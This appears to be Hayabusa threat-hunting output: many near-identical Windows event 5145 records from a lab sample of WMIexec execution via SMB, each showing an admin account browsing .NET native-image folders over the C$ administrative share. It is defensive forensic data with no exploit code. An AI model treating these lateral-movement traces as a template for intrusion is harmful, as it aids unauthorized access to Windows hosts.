0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 